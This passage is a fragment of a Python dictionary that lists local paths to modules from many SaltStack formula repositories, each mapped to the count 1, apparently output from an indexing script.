'/mnt/data/home/mdupont/experiments/salt-formulas/SmartReceipt_salt_state/_grains/instance': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/StartledPhoenix_saltstack-syncthing/_grains/syncthing': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/StephenPCG_vim-snippets-salt/gen-snippets': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/TheRealBill_salt-modules/lxc': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/UfSoft_salgema/salgema': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/UtahDave_salt-pi/pi': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/VertigoRay_salt-osx-dsconfigad/dsconfigad': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/WJIAN_salt_range/salt_range': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/WJIAN_sysinfo/sysinfo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aaae_saltstack_web/saltstack/accounts': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aaae_saltstack_web/saltstack/accounts/models': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aaae_saltstack_web/saltstack/accounts/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aaae_saltstack_web/saltstack/accounts/views': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aaae_saltstack_web/saltstack/manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aaae_saltstack_web/saltstack/saltstack': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aaae_saltstack_web/saltstack/saltstack/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aboe76_packer_salt-states_testing/salt/_grains/test_grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aboe76_packer_salt-states_testing/salt/_modules/foo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aboe76_packer_salt-states_testing/salt/saltsrc/py_render': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/acieroid_salt-states/_modules/ezjail': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/acieroid_salt-states/_states/freebsdconf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aexeagmbh_django_saltstack/django_saltstack/django_saltstack': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aexeagmbh_django_saltstack/django_saltstack/django_saltstack/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aexeagmbh_django_saltstack/django_saltstack/django_saltstack/settings/base': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aexeagmbh_django_saltstack/django_saltstack/main': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aexeagmbh_django_saltstack/django_saltstack/main/migrations': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aexeagmbh_django_saltstack/django_saltstack/manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aexeagmbh_django_saltstack/docs': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/aexeagmbh_django_saltstack/docs/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ahale_salt-playground/playground/_modules/firewall': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ahale_salt-playground/playground/_modules/swiftutils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ahale_salt-playground/playground/_states/loopbackdisk': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/akoumjian_shaker/docs/_themes/flask_theme_support': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/akoumjian_shaker/shaker/log': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/akoumjian_shaker/shaker/version': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/alexclear_salt-states-graphite-statsd-gdash/graphite/local_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/anderbubble_salt-states-firewall/_states/firewall_rule': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/astral1_vagrant-salt-test/salt/modules/pillar/rethinkdb_ext': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/astral1_vagrant-salt-test/salt/roots/_grains/mac_address': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/astral1_vagrant-salt-test/salt/roots/_grains/rethinkdb_grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/astral1_vagrant-salt-test/salt/roots/_modules/rethinkdb': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/astral1_vagrant-salt-test/salt/roots/_returners/rethinkdb_returner': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/atbell_salt-consul/_modules/consul_mod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/atbell_salt-consul/_states/consul_check': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/atbell_salt-consul/_states/consul_kv': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/atbell_salt-consul/_states/consul_service': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/auser_states/states/_modules/informer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/auser_states/states/_modules/linux_netstat': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/auser_states/states/_states/deploy': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/auser_states/states/_states/private_git': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/balamurugana_salt-gluster/gluster': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/_grains/ec2_info': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/_modules/elasticsearch_plugins': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/_returners/sentry_return': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/_states/archive': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/_states/aws_route53': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/_states/dnsimple': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/_states/elasticsearch_plugins': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/_states/pkg_file': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/apt/check': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/backup/server/check': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/elasticsearch/check': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/firewall/check': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bclermont_states/states/nrpe/check': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bechtoldt_salt-modules/_modules/datetimeutil': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/blast-hardcheese_blast-salt-states/_modules/blast': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bonJoeV_salt-states/files/bin/nacl': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/borgstrom_nacl/nacl': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/borgstrom_nacl/nacl/state': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/borgstrom_nacl/salt_renderer/nacl_renderer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/borgstrom_nacl/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/bossjones_salt-scarlett/salt/roots/salt/django/base': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/brutasse_states/_states/envdir': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/cedwards_SaltConf-2014/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/cgallemore_djvasa/djvasa': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/cgallemore_djvasa/djvasa/templates': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/cloudify-cosmo_cloudify-saltstack-plugin/main': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/cloudify-cosmo_cloudify-saltstack-plugin/main/saltapimgr': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/cloudify-cosmo_cloudify-saltstack-plugin/main/saltapimgr/exceptions': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/cloudify-cosmo_cloudify-saltstack-plugin/main/validation': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/conjurdemos_salt-stack-ssh/eventlisten': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/conjurdemos_salt-stack-ssh/srv/runners/conjur_register': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/conjurdemos_salt-stack-ssh/srv/runners/debug': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/corywright_salt-pillar-overlay-bug/salt/_grains/region': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/cro_salt-proxy-rest/rest': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/d1rk_salt/salt/_modules/ufw': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/d1rk_salt/salt/_states/augeas': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/d1rk_salt/salt/_states/ufw': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dangerousbeans_salt_states/_grains/test_grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dangerousbeans_salt_states/_modules/foo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dangerousbeans_salt_states/saltsrc/py_render': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/davechina_SaltStack/_modules/myTest': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/davechina_SaltStack/_modules/serveragent': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/davechina_SaltStack/_states/agentservice_state': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/daviddyball_salt/salt/_modules/jinja_renderer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/daviddyball_salt/salt/_returners/salt-logger_return': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/daviddyball_salt/salt/_states/jinja': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dgilm_salt-states-alienvault/_grains/alienvault': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dgilm_salt-states-alienvault/_modules/alienvault': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dhmsbr_salt-stack-remedy/doc/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dhmsbr_salt-stack-remedy/saltcloud/clouds': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dhmsbr_salt-stack-remedy/saltcloud/clouds/ibmsce': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dhmsbr_salt-stack-remedy/saltcloud/config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dhmsbr_salt-stack-remedy/saltcloud/exceptions': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dhmsbr_salt-stack-remedy/saltcloud/output': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dhmsbr_salt-stack-remedy/saltcloud/version': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dkilcy_juno-saltstack/states/openstack/_grains/openstack_ip_assignments': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dzderic_chicken-salt/salt_master_monkey': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/dzderic_salt-in-the-middle/middleman': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/eHealthAfrica_demo-app/demo': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/eHealthAfrica_demo-app/demo/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/eHealthAfrica_demo-app/demo_app': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/eHealthAfrica_demo-app/demo_app/models': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/eHealthAfrica_demo-app/demo_app/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/eHealthAfrica_demo-app/demo_app/views': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/eHealthAfrica_demo-app/manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/eHealthAfrica_salt_demo/saltstack/demo-app/manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/elbaschid_dockbot/dockbot': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/elbaschid_dockbot/dockbot/config_parser': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/elbaschid_dockbot/dockbot/database': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/elbaschid_dockbot/dockbot/scripts': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/elbaschid_dockbot/salt/base/salt/_modules/dockermod': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/elbaschid_dockbot/salt/base/salt/_states/docker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/elbaschid_salt-states/_modules/myping': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/elvard_age-of-saltstack/docs/conf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/esacteksab_learning-salt/django/base': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/esacteksab_salt-states/project1/base': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/esacteksab_salt-states/project2/base': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/felskrone_salt-eventsd/doc/share/doc/eventsd_workers/Minion_Return_Worker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/felskrone_salt-eventsd/doc/share/doc/eventsd_workers/Minion_Sub_Worker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/felskrone_salt-eventsd/doc/share/doc/eventsd_workers/New_Job_Worker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/felskrone_salt-eventsd/salteventsd/backends': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/felskrone_salt-eventsd/salteventsd/daemon': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/felskrone_salt-eventsd/salteventsd/mysql': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/felskrone_salt-eventsd/salteventsd/timer': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/felskrone_salt-eventsd/salteventsd/version': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/felskrone_salt-eventsd/salteventsd/worker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/fxdgear_salt-states/salt/_modules/sample': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/fxdgear_salt-states/salt/saltsrc/py_render': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/gladiatr72_pyOvirt/pyOvirt/bolts/config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/gladiatr72_pyOvirt/pyOvirt/nuts/PollableQueue': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/gladiatr72_pyOvirt/pyOvirt/ovirt/storagedomains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/grengojbo_python3-formula/python3/files/distribute_setup': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/gtmtechltd_salthiera/salt/pillar/salthiera': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/halfss_salt-dashboard/manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/halfss_salt-dashboard/salt_dashboard': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/halfss_salt-dashboard/salt_dashboard/api': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/halfss_salt-dashboard/salt_dashboard/api/common': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/halfss_salt-dashboard/salt_dashboard/settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/halfss_salt-dashboard/salt_dashboard/views': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/hipikat_salt-formulas/wsgi_still-formula/scripts/install_deps': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/holmboe_django-saltapi/django_saltapi': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/holmboe_django-saltapi/django_saltapi/forms': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/holmboe_django-saltapi/django_saltapi/models': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/holmboe_django-saltapi/django_saltapi/utils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/hvnsweeting_nrpebase/nrpebase': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/hvnsweeting_saltstates/_states/dnsimple': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ionutbalutoiu_salt-openstack/file_root/_modules/glance': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ionutbalutoiu_salt-openstack/file_root/_modules/ini_manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ionutbalutoiu_salt-openstack/file_root/_modules/keystone': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ionutbalutoiu_salt-openstack/file_root/_modules/neutron': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ionutbalutoiu_salt-openstack/file_root/_states/glance': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ionutbalutoiu_salt-openstack/file_root/_states/ini_manage': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ionutbalutoiu_salt-openstack/file_root/_states/keystone': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ionutbalutoiu_salt-openstack/file_root/_states/neutron': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ist0ne_salt-states/salt/_grains/roles': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ist0ne_salt-states/salt/zabbix/files/usr/lib/python2.6/site-packages/zabbix': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/ist0ne_salt-states/salt/zabbix/files/usr/lib/python2.6/site-packages/zabbix/zapi': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jaddison_salt-base-states/salt': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jaddison_salt-base-states/salt/_states/virtualenvwrapper': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jasondenning_salt-pillar-dynamo/dynamo_pillar': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/bootstrap': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/bootstrap/config': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/bootstrap/hash_updater': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/bootstrap/utils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/configurations/base/states/_modules/dmg': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/configurations/base/states/_modules/environment': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/configurations/base/states/_states/dmg': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/configurations/base/states/_states/environment': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/configurations/base/states/_states/iptables': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/configurations/base/states/_states/optional_file': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jeffh_Seafood/configurations/base/states/_states/package': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jesusaurus_salt-formula-rabbitmq/_modules/rabbitmq': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jesusaurus_salt-formula-rabbitmq/_states/rabbitmq_cluster': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jesusaurus_salt-formula-rabbitmq/_states/rabbitmq_plugin': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jesusaurus_salt-formula-rabbitmq/_states/rabbitmq_policy': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jesusaurus_salt-formula-rabbitmq/_states/rabbitmq_user': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jesusaurus_salt-formula-rabbitmq/_states/rabbitmq_vhost': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jlecount-sungevity_devsetup/setup': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/johnswanson_salt-modules/pwhash': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/jwineinger_salt-experiments/salt/graphite/local_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/kadel_salt-tools/modules/openvz': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/kerncai_saltstack/salt_configuration/_grains/squid': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_modules/cloudera': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_modules/flannel': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_modules/fleet': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_modules/kubernetes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_modules/mesos': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_modules/skydns': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_states/cloudera_cluster': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_states/cloudera_host': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_states/cloudera_parcel': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_states/cloudera_role': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_states/cloudera_role_config_group': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/_states/cloudera_service': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/khrisrichardson_salt-states/salt/openstack-dashboard-ubuntu-theme/etc/openstack-dashboard/ubuntu_theme': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/kjoconnor_salt-contrib/_grains/ec2': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/kjoconnor_salt-contrib/_modules/aws_elb': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/kjoconnor_salt-contrib/_states/aws_elb': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/kstaken_salt-test-runner/salttest': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/kvmate_kvmate-formula/django/files/local_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lietu-org_salt-init/merge_top_sls': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_modules/elasticsearch': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_modules/memcached': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_modules/nginx': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_modules/ntp': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_modules/parsed_network': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_modules/redis': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_modules/uwsgi': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_returners/carbon_new_return': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_returners/influxdb_return': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_returners/librato_return': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lincolnloop_salt-stats/salt/_returners/salmon_return': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/luwenju_saltstack_module/nginx_conf_create': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/lytics_saltfiles/graphite/local_settings': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/m87carlson_salt-states/states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/m87carlson_salt-states/states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/checker': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/m87carlson_salt-states/states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/messages': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/m87carlson_salt-states/states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/scripts': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/m87carlson_salt-states/states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/scripts/pyflakes': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/m87carlson_salt-states/states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/test': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/m87carlson_salt-states/states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/test/harness': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/m87carlson_salt-states/states/vim/files/pyflakes/ftplugin/python/pyflakes/pyflakes/test/test_script': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mafrosis_salt-formulae/_grains/vmware': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mafrosis_salt-formulae/closure-compiler/closure-compiler': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mafrosis_salt-formulae/salt-backports/mysql.2014-1-0.module': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mafrosis_salt-formulae/salt-backports/rabbitmq_user.2014-1-0.state': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mafrosis_salt-formulae/salt-backports/rabbitmq_user.2014-1-1.state': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/majerteam_samba_report_module/_modules/samba_users': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/_scripts/gentags_env': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/_scripts/reset-perms': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/files/projects/2/hooks/deploy_hook': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/files/usr/local/admin_scripts/nagios/check_burp_backup_age': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/files/usr/local/admin_scripts/nagios/check_burp_counters': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/files/usr/local/admin_scripts/nagios/check_inotify': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/files/usr/local/admin_scripts/nagios/check_mongodb': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/files/usr/local/admin_scripts/nagios/check_mysql_health_autoconnect': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/files/usr/local/admin_scripts/nagios/check_pop3_cleaner': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/files/usr/local/admin_scripts/nagios/check_rbl': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/files/usr/local/admin_scripts/nagios/check_sar_perf': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/api': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/grains': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/modules': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/modules/mc_state': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/pillar/mc_pillar': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/ping': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/project': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/renderers': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/returners': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/runners': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/states': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/states/bacula': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/states/mc_apache': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/states/mc_php': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/states/mc_project': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/states/mc_proxy': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/states/mc_registry': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/tests': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/tests/modules': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/tests/modules/base': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/makinacorpus_makina-states/mc_states/utils': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/marselester_salt-stack-example/fabfile': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mathcamp_aws-formula/_modules/aws_util': 1,
'/mnt/data/home/mdupont/experiments/salt-formulas/mathcamp_aws-formula/_modules/ec2': 1,
